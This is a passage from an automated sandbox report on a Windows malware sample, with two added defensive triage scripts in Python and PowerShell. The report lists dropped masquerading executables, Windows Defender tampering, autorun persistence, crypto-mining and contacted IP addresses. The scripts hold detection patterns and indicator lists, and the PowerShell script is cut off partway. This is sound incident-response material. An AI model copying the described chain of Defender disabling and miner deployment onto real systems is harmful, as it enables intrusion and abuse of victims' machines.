                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\certifi VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_ctypes.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_hashlib.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\_lzma.pyd VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
                                  Source: C:\Windows\Tasks\MSTask.exeQueries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\base_library.zip VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Tasks\MSTask.exe VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722 VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_socket.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\select.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_bz2.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_lzma.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\psutil VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_ssl.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_hashlib.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\_queue.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\Windows\Temp\_MEI81722\unicodedata.pyd VolumeInformation
Source: C:\Windows\Tasks\MSTask.exe    Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe VolumeInformation
Source: C:\Windows\Bridgeprovider.exe    Queries volume information: C:\Windows\Bridgeprovider.exe VolumeInformation
Source: C:\Windows\Bridgeprovider.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Bridgeprovider.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe    Code function: 0_2_0088DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0088DF1E
Source: C:\Windows\Tasks\MSTask.exe    Code function: 56_2_00007FF7B1DB6560 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 56_2_00007FF7B1DB6560
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe    Code function: 0_2_0087B146 GetVersionExW, 0_2_0087B146
Source: C:\Windows\SysWOW64\wscript.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
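The file paths recorded above and in the Yara sections that follow (MSTask.exe and 1.exe under C:\Windows\Tasks, Bridgeprovider.exe directly under C:\Windows, MicrosoftDefenger.exe under C:\Windows\INF, MicrosoftPrt.exe in the all-users Startup folder, and the C:\Windows\Temp\_MEI81722 directory full of .pyd modules, which is the extraction directory a PyInstaller one-file executable creates at run time) are the on-disk footprint a responder would hunt for. The script below is an added example, not part of the Joe Sandbox report, that triages a file inventory against those paths. The inventory is constructed for the example; the rule that flags any executable sitting directly in C:\Windows\Tasks or the Startup folder is a heuristic assumed here, not something the report states.

```python
import re
from collections import defaultdict

# Dropped / executed file paths taken from this report (lower-cased for matching).
REPORT_IOC_PATHS = {
    "c:\\windows\\tasks\\mstask.exe",
    "c:\\windows\\tasks\\1.exe",
    "c:\\windows\\bridgeprovider.exe",
    "c:\\windows\\inf\\microsoftdefenger.exe",
    "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\microsoftprt.exe",
}

# PyInstaller one-file binaries unpack their bundled modules into <temp>\_MEI<digits>;
# the report shows C:\Windows\Temp\_MEI81722 with _ssl.pyd, _socket.pyd, psutil, etc.
PYINSTALLER_DIR = re.compile(r"\\temp\\_mei\d+(\\|$)")

# Heuristic (assumption for this example, not from the report): an executable that
# lives directly in C:\Windows\Tasks or in the all-users Startup folder is rarely legitimate.
SUSPICIOUS_EXE_DIRS = (
    "c:\\windows\\tasks",
    "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup",
)
EXECUTABLE_EXT = (".exe", ".dll", ".sys", ".scr")


def normalize(path: str) -> str:
    """Lower-case and use backslashes so that case or slash style cannot dodge a match."""
    return path.strip().lower().replace("/", "\\")


def in_suspicious_exe_dir(p: str) -> bool:
    """True when p is an executable placed directly (no sub-folder) in one of the flagged dirs."""
    if not p.endswith(EXECUTABLE_EXT):
        return False
    for d in SUSPICIOUS_EXE_DIRS:
        prefix = d + "\\"
        if p.startswith(prefix) and "\\" not in p[len(prefix):]:
            return True
    return False


def triage(paths):
    """Return {original_path: [reasons]} for every path that trips at least one rule."""
    hits = defaultdict(list)
    for raw in paths:
        p = normalize(raw)
        if p in REPORT_IOC_PATHS:
            hits[raw].append("known-ioc-path")
        if PYINSTALLER_DIR.search(p):
            hits[raw].append("pyinstaller-extraction-dir")
        if in_suspicious_exe_dir(p):
            hits[raw].append("exe-in-unexpected-dir")
    return dict(hits)


# Constructed inventory: a mix of paths from the report and two benign files
# (notepad.exe and SA.DAT, the Task Scheduler's own data file) that must not fire.
SAMPLE_INVENTORY = [
    "C:\\Windows\\Tasks\\MSTask.exe",
    "C:\\Windows\\Temp\\_MEI81722\\_ssl.pyd",
    "C:\\Windows\\Temp\\_MEI81722\\psutil\\_psutil_windows.pyd",
    "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\MicrosoftPrt.exe",
    "C:\\Windows\\Bridgeprovider.exe",
    "C:\\Windows\\System32\\notepad.exe",
    "C:\\Windows\\Tasks\\SA.DAT",
]

if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_INVENTORY).items():
        print(f"{path}: {', '.join(reasons)}")
```

On a real host the inventory would come from an EDR file listing or a recursive directory walk of C:\Windows, C:\ProgramData and the user profile; the match against `REPORT_IOC_PATHS` is exact, so a rebuilt sample that renames its droppers will only be caught by the two structural rules, which is why both are kept alongside the path list.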

                                  Stealing of Sensitive Information

Source: Yara match    File source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match    File source: Process Memory Space: Bridgeprovider.exe PID: 4144, type: MEMORYSTR
Source: Yara match    File source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match    File source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
Source: Yara match    File source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match    File source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match    File source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match    File source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match    File source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
Source: Yara match    File source: C:\Windows\Bridgeprovider.exe, type: DROPPED
Source: Yara match    File source: C:\Windows\Tasks\1.exe, type: DROPPED
Source: Yara match    File source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match    File source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
Source: Yara match    File source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match    File source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
Source: Yara match    File source: C:\Windows\Bridgeprovider.exe, type: DROPPED
Source: Yara match    File source: C:\Windows\Tasks\1.exe, type: DROPPED

                                  Remote Access Functionality

                                  Source: Yara matchFile source: 00000041.00000002.2015361827.00000000137A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Bridgeprovider.exe PID: 4144, type: MEMORYSTR
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000003C.00000003.1921505628.0000000006A67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000003C.00000003.1922516714.0000000006A62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000041.00000000.1945948494.0000000000CB2000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.3.migrate.exe.93436f7.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab56f0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 60.3.1.exe.6ab06f0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 65.0.Bridgeprovider.exe.cb0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Windows\INF\MicrosoftDefenger.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Bridgeprovider.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Tasks\1.exe, type: DROPPED
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005DA3 bind,WSAGetLastError,62_2_00007FFDFB005DA3
MITRE ATT&CK Matrix

Techniques with matched signatures, grouped by the tactic column in which the report's matrix places them. The bracketed digits are the signature-count badges rendered next to each technique (the digits run together in extraction); techniques shown without a badge are the matrix scaffold and are not listed.

Reconnaissance: no matched techniques
Resource Development: Scripting [111]
Initial Access: no matched techniques
Execution: Windows Management Instrumentation [1]; Native API [5]; Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Service Execution [12]; PowerShell [1]
Persistence: Scripting [111]; DLL Side-Loading [1]; Windows Service [33]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [321]; Services File Permissions Weakness [1]
Privilege Escalation: Exploitation for Privilege Escalation [1]; DLL Side-Loading [1]; Access Token Manipulation [1]; Windows Service [33]; Process Injection [12]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [321]; Services File Permissions Weakness [1]
Defense Evasion: Disable or Modify Tools [31]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]; File Deletion [1]; Masquerading [131]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [1]; Process Injection [12]; Services File Permissions Weakness [1]
Credential Access: no matched techniques
Discovery: System Time Discovery [2]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [37]; Security Software Discovery [331]; Virtualization/Sandbox Evasion [231]; Process Discovery [4]; Application Window Discovery [1]
Lateral Movement: Taint Shared Content [1]
Collection: Archive Collected Data [11]
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [2]
Exfiltration: no matched techniques
Impact: no matched techniques
Behavior Graph

Behavior Graph ID: 1571089   Sample: IYXE4Uz61k.exe   Start date: 08/12/2024   Architecture: WINDOWS   Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

Process tree as drawn in the graph (dropped files, contacted hosts and per-process signatures):

IYXE4Uz61k.exe
  drops: C:\ProgramData\migrate.exe (PE32)
  signatures: Modifies Windows Defender protection settings; Adds extensions / path to Windows Defender exclusion list; Disables Windows Defender (via service or powershell)
  +- cmd.exe
  |    signatures: Wscript starts Powershell (via cmd or directly); Drops PE files to the startup folder; Modifies Windows Defender protection settings; 2 other signatures
  |    +- cmd.exe
  |    |    signatures: Wscript starts Powershell (via cmd or directly); Modifies Windows Defender protection settings; Adds extensions / path to Windows Defender exclusion list; Disables Windows Defender (via service or powershell)
  |    |    +- migrate.exe
  |    |    |    drops: C:\Windows\Tasks\Wrap.exe (PE32+); C:\Windows\Tasks\Wmiic.exe (PE32+); C:\Windows\Tasks\WinRing0x64.sys (PE32+); 7 other malicious files
  |    |    |    signatures: Binary is likely a compiled AutoIt script file; Sample is not signed and drops a device driver
  |    |    |    +- cmd.exe
  |    |    |         drops: C:\ProgramData\Microsoft\...\MicrosoftPrt.exe (PE32+)
  |    |    |         signatures: Drops executables to the windows directory (C:\Windows) and starts them
  |    |    |         +- 1.exe
  |    |    |         |    drops: C:\Windows\Bridgeprovider.exe (PE32); C:\Windows\fwJLoWFGhpY.bat (ASCII)
  |    |    |         |    signatures: Multi AV Scanner detection for dropped file
  |    |    |         |    +- wscript.exe
  |    |    |         |         signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
  |    |    |         |         +- cmd.exe
  |    |    |         |              signatures: Drops executables to the windows directory (C:\Windows) and starts them
  |    |    |         |              +- Bridgeprovider.exe
  |    |    |         |              |    drops: C:\Windows\INF\MicrosoftDefenger.exe (PE32); C:\Users\user\Desktop\vrXfSuSA.log (PE32); C:\Users\user\Desktop\tvjECxvw.log (PE32); 23 other malicious files
  |    |    |         |              |    signatures: Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Creates an autostart registry key pointing to binary in C:\Windows
  |    |    |         |              |    +- csc.exe
  |    |    |         |              |         drops: C:\Windows\...\SecurityHealthSystray.exe (PE32)
  |    |    |         |              |         signatures: Infects executable files (exe, dll, sys, html)
  |    |    |         |              +- conhost.exe
  |    |    |         +- Wmiic.exe
  |    |    |         |    +- conhost.exe
  |    |    |         +- Wmiic.exe
  |    |    |         |    +- conhost.exe
  |    |    |         +- 5 other processes
  |    |    |              +- net1.exe
  |    |    +- powershell.exe
  |    |    |    signatures: Loading BitLocker PowerShell Module
  |    |    +- powershell.exe
  |    |    +- 15 other processes
  |    +- conhost.exe
  +- powershell.exe
  |    signatures: Loading BitLocker PowerShell Module
  |    +- conhost.exe
  +- powershell.exe
       +- conhost.exe

Wmiic.exe (second top-level start)
  signatures: Drops executables to the windows directory (C:\Windows) and starts them
  +- IntelConfigService.exe
  |    signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Drops executables to the windows directory (C:\Windows) and starts them
  |    +- MSTask.exe
  |    |    drops: C:\Windows\Temp\_MEI81722\unicodedata.pyd (PE32+); C:\Windows\Temp\_MEI81722\select.pyd (PE32+); C:\Windows\Temp\_MEI81722\python38.dll (PE32+); 15 other files (12 malicious)
  |    |    signatures: Multi AV Scanner detection for dropped file; Drops executables to the windows directory (C:\Windows) and starts them; Potentially malicious time measurement code found
  |    |    +- MSTask.exe
  |    |    |    network: 45.137.64.40, ports 49738, 80 (ON-LINE-DATAServerlocation-NetherlandsDrontenNL, Netherlands)
  |    |    +- conhost.exe
  |    +- Wrap.exe
  |    |    signatures: Found API chain indicative of debugger detection
  |    |    +- cmd.exe
  |    |    |    signatures: Drops executables to the windows directory (C:\Windows) and starts them
  |    |    |    +- ApplicationsFrameHost.exe
  |    |    |         network: 185.17.0.139, ports 49735, 49739, 49740 (SUPERSERVERSDATACENTERRU, Russian Federation); Detected Stratum mining protocol
  |    |    |         signatures: Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining
  |    |    +- conhost.exe
  |    +- Superfetch.exe
  |    |    signatures: Binary is likely a compiled AutoIt script file
  |    +- 3 other processes
  |         +- 6 other processes
  +- conhost.exe
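The behavior graph gives a responder everything needed to check other hosts for the same infection: executables dropped into C:\Windows\Tasks and C:\Windows\INF, Run keys pointing at binaries under C:\Windows, Defender exclusions and disabled protection set through MpPreference, the WinRing0x64.sys driver, and live connections to 185.17.0.139 and 45.137.64.40. The PowerShell below is an added host-triage example, not part of the Joe Sandbox report or of the malware. The file paths and IP addresses come from this report (the startup-folder path is taken from the dropped-files table, where it appears in full); the function names, the regexes and the output layout are this example's own choices. It needs an elevated session, and Get-MpPreference only works where Microsoft Defender is installed.

```powershell
# Added host-triage example for the artifacts in this report (not part of the Joe Sandbox output).
# Run from an elevated PowerShell session. IOC values are taken from the report; function names,
# regexes and output columns are this example's own.

$ReportIocs = @{
    Paths = @(                                          # dropped PE files and driver shown in the graph
        'C:\ProgramData\migrate.exe',
        'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe',
        'C:\Windows\Bridgeprovider.exe',
        'C:\Windows\INF\MicrosoftDefenger.exe',
        'C:\Windows\Tasks\1.exe', 'C:\Windows\Tasks\MSTask.exe', 'C:\Windows\Tasks\Wrap.exe',
        'C:\Windows\Tasks\Wmiic.exe', 'C:\Windows\Tasks\Superfetch.exe',
        'C:\Windows\Tasks\IntelConfigService.exe', 'C:\Windows\Tasks\ApplicationsFrameHost.exe',
        'C:\Windows\Tasks\MicrosoftPrt.exe', 'C:\Windows\Tasks\WinRing0x64.sys'
    )
    RemoteIps = @('185.17.0.139', '45.137.64.40')        # C2 / Stratum host and miner-config host
}

function Get-DroppedFileMatches {
    # Exact report paths first, then any other PE in C:\Windows\Tasks, which normally holds no executables.
    foreach ($path in $ReportIocs.Paths) {
        if (Test-Path -LiteralPath $path) {
            [pscustomobject]@{ Check = 'DroppedFile'; Value = $path
                               Detail = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash }
        }
    }
    Get-ChildItem -LiteralPath 'C:\Windows\Tasks' -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.exe', '.dll', '.sys' -and $_.FullName -notin $ReportIocs.Paths } |
        ForEach-Object {
            [pscustomobject]@{ Check = 'PEInTasksDir'; Value = $_.FullName
                               Detail = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash }
        }
}

function Get-SuspiciousAutoruns {
    # The report flags autostart keys pointing at binaries under C:\Windows; legitimate software rarely does this.
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -in $meta) { continue }
            # value points into C:\Windows\Tasks, C:\Windows\INF, or directly at C:\Windows\<name>.exe
            if ("$($p.Value)" -match '(?i)^"?C:\\Windows\\(Tasks|INF)\\|^"?C:\\Windows\\[^\\]+\.exe') {
                [pscustomobject]@{ Check = 'Autorun'; Value = "$key\$($p.Name)"; Detail = $p.Value }
            }
        }
    }
}

function Get-DefenderTampering {
    # The dropper adds exclusions and disables protection through MpPreference (see the signatures above).
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if (-not $pref) { return }
    foreach ($ex in @($pref.ExclusionPath) + @($pref.ExclusionProcess) + @($pref.ExclusionExtension)) {
        if ($ex -and $ex -match '(?i)Windows\\(Tasks|INF|Temp)|ProgramData|^\.?(exe|dll|sys|bat)$') {
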